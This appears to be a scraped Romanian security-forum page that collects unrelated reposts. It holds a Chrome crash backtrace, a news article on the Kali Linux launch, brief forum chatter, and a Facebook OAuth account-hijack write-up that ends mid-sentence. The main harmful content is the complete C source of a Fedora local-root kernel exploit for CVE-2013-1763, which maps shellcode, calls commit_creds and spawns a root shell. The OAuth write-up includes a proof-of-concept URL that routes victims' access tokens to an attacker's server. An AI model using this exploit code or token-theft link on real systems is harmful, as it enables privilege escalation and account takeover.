0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #13 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 16 (Thread 0xacdfcb70 (LWP 10489)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365342 in pthread_cond_timedwait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b24cc in base::ConditionVariable::TimedWait(base::TimeDelta const&) () #3 0xb49b36dd in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb498e11a in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #5 0xb498846e in MessageLoop::RunInternal() () #6 0xb49a4ae9 in base::RunLoop::Run() () #7 0xb498775e in MessageLoop::Run() () #8 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #9 0xb49bfa91 in base::Thread::ThreadMain() () #10 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #11 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #12 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 15 (Thread 0xace1db70 (LWP 10488)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 14 (Thread 0xace3eb70 (LWP 10487)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 13 (Thread 0xace5fb70 (LWP 10486)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 12 (Thread 0xad660b70 (LWP 10485)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f40d37 in syscall () from /lib/tls/i686/cmov/libc.so.6 #2 0xb49e6410 in epoll_wait () #3 0xb49e5e75 in epoll_dispatch () #4 0xb49e42a7 in event_base_loop () #5 0xb495eda7 in base::MessagePumpLibevent::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb652797d in content::BrowserThreadImpl::IOThreadRun(MessageLoop*) () #11 0xb6529da3 in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 11 (Thread 0xade61b70 (LWP 10484)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f40d37 in syscall () from /lib/tls/i686/cmov/libc.so.6 #2 0xb49e6410 in epoll_wait () #3 0xb49e5e75 in epoll_dispatch () #4 0xb49e42a7 in event_base_loop () #5 0xb495eda7 in base::MessagePumpLibevent::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb6527a1d in content::BrowserThreadImpl::CacheThreadRun(MessageLoop*) () #11 0xb6529db1 in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 10 (Thread 0xae662b70 (LWP 10483)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49b36f0 in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb49b3736 in base::WaitableEvent::Wait() () #5 0xb498e0c4 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb6527abd in content::BrowserThreadImpl::ProcessLauncherThreadRun(MessageLoop*) () #11 0xb6529dbf in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 9 (Thread 0xaee63b70 (LWP 10482)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49b36f0 in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb49b3736 in base::WaitableEvent::Wait() () #5 0xb498e0c4 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb6527b5d in content::BrowserThreadImpl::FileUserBlockingThreadRun(MessageLoop*) () #11 0xb6529dce in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 8 (Thread 0xaf664b70 (LWP 10481)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f40d37 in syscall () from /lib/tls/i686/cmov/libc.so.6 #2 0xb49e6410 in epoll_wait () #3 0xb49e5e75 in epoll_dispatch () #4 0xb49e42a7 in event_base_loop () #5 0xb495eda7 in base::MessagePumpLibevent::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb6527bfd in content::BrowserThreadImpl::FileThreadRun(MessageLoop*) () #11 0xb6529dde in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 7 (Thread 0xafe65b70 (LWP 10480)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49b36f0 in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb49b3736 in base::WaitableEvent::Wait() () #5 0xb498e0c4 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb6527c9d in content::BrowserThreadImpl::WebKitThreadRun(MessageLoop*) () #11 0xb6529dee in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 6 (Thread 0xb0666b70 (LWP 10479)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49b36f0 in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb49b3736 in base::WaitableEvent::Wait() () #5 0xb498e0c4 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb6527d3d in content::BrowserThreadImpl::DBThreadRun(MessageLoop*) () #11 0xb6529dfe in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 5 (Thread 0xb280db70 (LWP 10478)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3367f5b in read () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb4254037 in (anonymous namespace)::ShutdownDetector::ThreadMain() () #3 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #4 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #5 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 4 (Thread 0xb1733b70 (LWP 10477)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49b36f0 in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb49b3736 in base::WaitableEvent::Wait() () #5 0xb498e0c4 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb49bfa91 in base::Thread::ThreadMain() () #11 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #12 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #13 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 3 (Thread 0xb1f34b70 (LWP 10476)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f3d971 in select () from /lib/tls/i686/cmov/libc.so.6 #2 0xb497f952 in base::files::(anonymous namespace)::InotifyReaderCallback(base::files::(anonymous namespace)::InotifyReader*, int, int) () #3 0xb497cc19 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (base::files::(anonymous namespace)::InotifyReader*, int, int)>, void ()(base::files::(anonymous namespace)::InotifyReader*, int, int), void ()(base::files::(anonymous namespace)::InotifyReader*, int, int)>, void ()(base::files::(anonymous namespace)::InotifyReader*, int, int)>::Run(base::internal::BindStateBase*) () #4 0xb498c220 in MessageLoop::RunTask(base::PendingTask const&) () #5 0xb498c8c2 in MessageLoop::DeferOrRunPendingTask(base::PendingTask const&) () #6 0xb498cc31 in MessageLoop::DoWork() () #7 0xb498e06b in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #8 0xb498846e in MessageLoop::RunInternal() () #9 0xb49a4ae9 in base::RunLoop::Run() () #10 0xb498775e in MessageLoop::Run() () #11 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 2 (Thread 0xb2735b70 (LWP 10475)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f40d37 in syscall () from /lib/tls/i686/cmov/libc.so.6 #2 0xb49e6410 in epoll_wait () #3 0xb49e5e75 in epoll_dispatch () #4 0xb49e42a7 in event_base_loop () #5 0xb495eda7 in base::MessagePumpLibevent::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb49bfa91 in base::Thread::ThreadMain() () #11 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #12 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #13 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 1 (Thread 0xb2977990 (LWP 10468)): #0 0xb40ea92b in (anonymous namespace)::InspectDataSource::StartDataRequest(std::string const&, bool, int) () #1 0xb40caf9b in base::internal::Invoker<4, base::internal::BindState<base::internal::RunnableAdapter<void (ChromeURLDataManager::DataSource:)(std::string const&, bool, int)>, void ()(ChromeURLDataManager::DataSource*, std::string const&, bool, int), void ()(ChromeURLDataManager::DataSource*, std::string, bool, int)>, void ()(ChromeURLDataManager::DataSource*, std::string const&, bool, int)>::Run(base::internal::BindStateBase*) () #2 0xb498c220 in MessageLoop::RunTask(base::PendingTask const&) () #3 0xb498c8c2 in MessageLoop::DeferOrRunPendingTask(base::PendingTask const&) () #4 0xb498cc31 in MessageLoop::DoWork() () #5 0xb49d58be in base::MessagePumpGlib::RunWithDispatcher(base::MessagePump::Delegate*, base::MessagePumpDispatcher*) () #6 0xb49d543c in base::MessagePumpGlib::Run(base::MessagePump::Delegate*) () #7 0xb498846e in MessageLoop::RunInternal() () #8 0xb49a4ae9 in base::RunLoop::Run() () #9 0xb46513f5 in ChromeBrowserMainParts::MainMessageLoopRun(int*) () #10 0xb65262ec in content::BrowserMainLoop::RunMainMessageLoopParts() () #11 0xb6527280 in (anonymous namespace)::BrowserMainRunnerImpl::Run() () #12 0xb65247f3 in BrowserMain(content::MainFunctionParams const&) () #13 0xb48fb758 in content::RunNamedProcessTypeMain(std::string const&, content::MainFunctionParams const&, content::ContentMainDelegate*) () #14 0xb48fb8b0 in content::ContentMainRunnerImpl::Run() () #15 0xb48fa797 in content::ContentMain(int, char const**, content::ContentMainDelegate*) () #16 0xb3fbe60b in ChromeMain () #17 0xb3fbe5c2 in main () eax 0x4 4 ecx 0xb81187c0 -1206810688 edx 0x0 0 ebx 0xb8158ff4 -1206546444 esp 0xbfffdfa0 0xbfffdfa0 ebp 0xbfffe588 0xbfffe588 esi 0xbfffe4b0 -1073748816 edi 0xb8829880 -1199400832 eip 0xb40ea92b 0xb40ea92b <(anonymous namespace)::InspectDataSource::StartDataRequest(std::string const&, bool, int)+1899> eflags 0x210286 [ PF SF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 => 0xb40ea92b <_ZN12_GLOBAL__N_117InspectDataSource16StartDataRequestERKSsbi+1899>: mov (%edx),%eax 0xb40ea92d <_ZN12_GLOBAL__N_117InspectDataSource16StartDataRequestERKSsbi+1901>: mov %edx,(%esp) 0xb40ea930 <_ZN12_GLOBAL__N_117InspectDataSource16StartDataRequestERKSsbi+1904>: call *0x28(%eax) 0xb40ea933 <_ZN12_GLOBAL__N_117InspectDataSource16StartDataRequestERKSsbi+1907>: mov %eax,-0x580(%ebp) edx 0x0 0 eax 0x4 4 1: x/i $pc => 0xb40ea92b <_ZN12_GLOBAL__N_117InspectDataSource16StartDataRequestERKSsbi+1899>: mov (%edx),%eax Sursa: Google Chrome 21.0.1180.57 NULL Pointer ? Packet Storm

Fedora Linux SOCK_DIAG Local Root Authored by Thiebaud Weksteen Local root exploit for Fedora 18 x86_64 using nl_table to leverage the sock_diag_handlers[] vulnerability. /* * CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8 * This exploit uses nl_table to jump to a known location */ #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <linux/sock_diag.h> #include <linux/inet_diag.h> #include <linux/unix_diag.h> #include <sys/mman.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; unsigned long sock_diag_handlers, nl_table; int __attribute__((regparm(3))) kernel_code() { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy, sym[512]; int ret = 0; f = fopen("/proc/kallsyms", "r"); if (!f) { return 0; } while (ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym); if (ret == 0) { fscanf(f, "%s\n", sym); continue; } if (!strcmp(name, sym)) { printf("[+] resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } int main(int argc, char*argv[]) { int fd; unsigned family; struct { struct nlmsghdr nlh; struct unix_diag_req r; } req; char buf[8192]; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ printf("Can't create sock diag socket\n"); return -1; } memset(&req, 0, sizeof(req)); req.nlh.nlmsg_len = sizeof(req); req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; req.nlh.nlmsg_seq = 123456; req.r.udiag_states = -1; req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; commit_creds = (_commit_creds) get_symbol("commit_creds"); prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); sock_diag_handlers = get_symbol("sock_diag_handlers"); nl_table = get_symbol("nl_table"); if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){ printf("some symbols are not available!\n"); exit(1); } family = (nl_table - sock_diag_handlers) / 8; printf("family=%d\n",family); req.r.sdiag_family = family; if(family>255){ printf("nl_table is too far!\n"); exit(1); } unsigned long mmap_start, mmap_size; mmap_start = 0x100000000; mmap_size = 0x200000; printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size); if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } memset((void*)mmap_start, 0x90, mmap_size); char jump[] = "\x55" // push %ebp "\x48\x89\xe5" // mov %rsp, %rbp "\x48\xc7\xc0\x00\x00\x00\x00" // movabs 0x00, %rax "\xff\xd0" // call *%rax "\x5d" // pop %rbp "\xc3"; // ret unsigned int *asd = (unsigned int*) &jump[7]; *asd = (unsigned int)kernel_code; printf("&kernel_code = %x\n", (unsigned int) kernel_code); memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump)); if ( send(fd, &req, sizeof(req), 0) < 0) { printf("bad send\n"); close(fd); return -1; } printf("uid=%d, euid=%d\n",getuid(), geteuid() ); if(!getuid()) system("/bin/sh"); } Sursa: Fedora Linux SOCK_DIAG Local Root ? Packet Storm

Ce e de ShowOff, ca ai intrat pe un link si ai pus o ghilimea? Trashed!

Unhook la SSDT? Si la Kaspersky merge?

Da, RSSOwl am si eu si e bine pus la punct. PS: Pentru unele feed-uri mereu gaseste unele vechi ca fiind noi. Dar e ok in rest.

1. Doar BitDefender? 2. Proactive Defence (sau cum se cheama la Bit) era pornita? 3. Are driver? Ruleaza kernel-mode?

[h=1]BackTrack successor Kali Linux launched[/h]By Darren Pauli on Mar 13, 2013 10:04 PM A computer small enough to fit inside the palm of a hand sits in the corner of an office, its lights blinking. It looks like a toy to most, but the small ARM-based machine is running the latest version of Backtrack, and is breaking into the corporate network. Such a feat was not possible prior to this evening's release of Kali, the sixth installment of the uber-powerful and super-secure penetration testing platform. BackTrack obtained support for ARM-based devices as part of its quiet year-long and ground-up overhaul by the small group of security professionals who designed the operating system, now considered essential kit for penetration tests. The authors hailing from Offensive Security together with security professionals at Rapid7, who offered free assistance in the rebuild, announced Kali at BlackHat Europe. Outwardly, Kali looks the same as the previous version of BackTrack. But dig a little deeper, according to founder Mati Aharoni, and that's where the similarities end. "It boots like BackTrack, but when you look deeper into Kali, you see all these amazing new features that just weren't available in BackTrack," Aharoni told SC speaking ahead of the launch in Amsterdam. "Everything has changed." Kali has become sleeker and more secure: All packages were subject to a vetting process and were signed by developers with GPG keys. This Aharoni said introduced complete visibility into the development chain. "There is a very clear public development of each package so you can see changes easily. Visibility increased ten-fold." The Metasploit Framework too has been rebuilt. Rapid7, keen to remove the rough-around-the-edges integration of the popular exploit arsenal within BackTrack, contacted Offensive Security. In a streak of luck, the call came in early in Kali's development. From there, Metasploit underwent a considerable overhaul to become one of the most complex packages in Kali. "Users will be in for a much smoother ride," Aharoni said. "It was never built to be packaged as a distribution so we needed to massage it" This took the form of a Debian repo rather than an at times messy binary installer, Rapid7 product manager Christian Kirsch said. "A tonne of our users were using Metasploit on BackTrack," Kirsch said. "Now if you update Kali, you update Metasploit." "It is critical to take the view of the attacker to see if your defences are working. The smartest people in the world may make mistakes in setting up defences." It is also features a more friendly user interface and was available in the paid professional edition. A razor has been applied to BackTrack's pre-packaged pen testing tools, eradicating 50 unpopular tools and introducing more powerful offerings into Kali. iKat, a hacking tool to audit the security of browser controlled enviroments like Kiosks, Citrix Terminals and WebTVs, was one such addition. The developers went to lengths to get the tool on board and had even helped the author further develop and integrate it into Kali. Kali comes as fully customisable. Users were able to pick and choose the tools they want in the platform, including private applications, prior to downloading the ISO, even down to their choice of wallpaper. This Aharoni said makes Kali open to low-end systems and ARM based devices. Pre-built packages exist for a host of ARM devices including Raspberry Pi and ODROID. Kali is now available for download and the wiki page is also online. Sursa: BackTrack successor Kali Linux launched - Applications - SC Magazine Australia - Secure Business Intelligence

[h=3]Facebook hacking accounts using another OAuth vulnerability[/h]Posted by: Mohit Kumar onTuesday, March 12, 2013 Remember the last OAuth Flaw in Facebook, that allow an attacker to hijack any account without victim's interaction with any Facebook Application, was reported by white hat Hacker 'Nir Goldshlager'. After that Facebook security team fixed that issue using some minor changes. Yesterday Goldshlager once again pwn Facebook OAuth mechanism by bypassing all those minor changes done by Facebook Team. He explains the complete Saga of hunting Facebook bug in a blog post. As explained in last report on The hacker News, OAuth URL contains two parameters i.e. redirect_uri &next, and using Regex Protection (%23xxx!,%23/xxx,/) Facebook team tried to secure that after last patch. In recent discovered technique hacker found that next parameter allow facebook.facebook.com domain as a valid option and multiple hash signs is now enough to bypass Regex Protection. He use facebook.com/l.php file (used by Facebook to redirect users to external links) to redirect victims to his malicious Facebook application and then to his own server for storing token values, where tokens are the alternate access to any Facebook account without password. But a warning message while redirecting ruin the show ! No worries, he found that 5 bytes of data in redirection URL is able to bypass this warning message. Example: https://www.facebook.com/l/goldy;touch.facebook.com/apps/sdfsdsdsgs (where 'goldy' is the 5 byte of data used). Now at the last step, He Redirect the victim to external websites located in files.nirgoldshlager.com (attacker server) via malicious Facebook app created by him and victim's access_token will be logged there. So here we have the final POC that can hack any Facebook account by exploiting another Facebook OAuth bug. For all browsers: https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https://facebook.facebook.com/%23/x/%23/l/ggggg%3btouch.facebook.com/apps/sdfsdsdsgs%23&display=page&fbconnect=1&method=permissions.request&response_type=token For Firefox browser: 